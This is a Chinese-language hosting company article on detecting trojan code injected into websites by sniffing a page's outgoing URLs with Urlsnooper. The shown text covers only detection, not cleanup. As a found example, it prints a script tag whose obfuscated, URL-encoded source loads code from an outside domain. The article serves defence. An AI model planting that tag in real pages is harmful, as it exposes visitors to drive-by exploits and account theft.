服务器网站挂马简单清理方法--新闻资讯--郑州中科
  您当前的位置:首页--新闻资讯
服务器网站挂马简单清理方法
时间:2018-3-8 17:00:03 来源:郑州中科

据不完全统计,90%的服务器网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。

当一个网站运营很长时间后,网站文件会非常多,手工查看网页文件代码非常困难,杀毒软件仅仅对恶意代码进行查杀,对网页木马以及挂马程序不一定全部查杀,本文就如何利用一些安全检测工具软件来检测和清除网站木马方面进行探讨,使用本文提及的工具可以很轻松的检测网站是否被挂马。

    一、检测网页木马程序

   1.安装urlsnooper 软件

   Urlsnooper是一款URL嗅探工具,其官方主页地址为:[url]http://www.donationcoder.com/urlsnooper[/url],安装非常简单,按照提示进行安装即可。第一次使用时需要程序会自动检查网卡,查看能否正常连接网络,设置正确无误后,应该出现如图1所示的画面。 


注意:

   如果未出现图1所示界面,说明程序设置存在问题,笔者在测试时使用发现该程序无法检测无线网卡,因此无法在无限网络中使用。

   2.对网站进行侦测

  在Urlsnooper中的“Protocol Filter”中选择“Show All”,然后单击“Sniff Network”按钮开始监听网络。接着使用IE浏览器打开需要进行检测木马的网站,Urlsnooper会自动抓取网站中的所有连接,在Index中按照五位数字序号进行排列,如图2所示。


说明:

在侦测结果中可能包含的连接地址非常多,这个时候就需要进行排查,可以选中每一个记录,Urlsnooper会在下方中显示详细的监听结果,如图2所示,就发现存在一段挂马代码:<script src=http://%61%76%65%31%2E%63%6E></script>

在百度搜索中对其进行搜索,如图3所示,有30多项搜索结果,从查询结果可以辅佐证明该段代码为挂马代码。


关于我们 付款方式 客服中心 参观机房 联系我们 招聘人才

CopyRight 2002-2008, CXX .COM.CN, Inc. All Rights Reserved ICP备案编号:豫ICP备05007721

《中华人民共和国电信与信息服务业务经营许可证》运营商:郑州中科信息技术有限公司

省内业务受理:郑州市农业路东16号省汇中心A座2002室(政七街与农业路交叉口)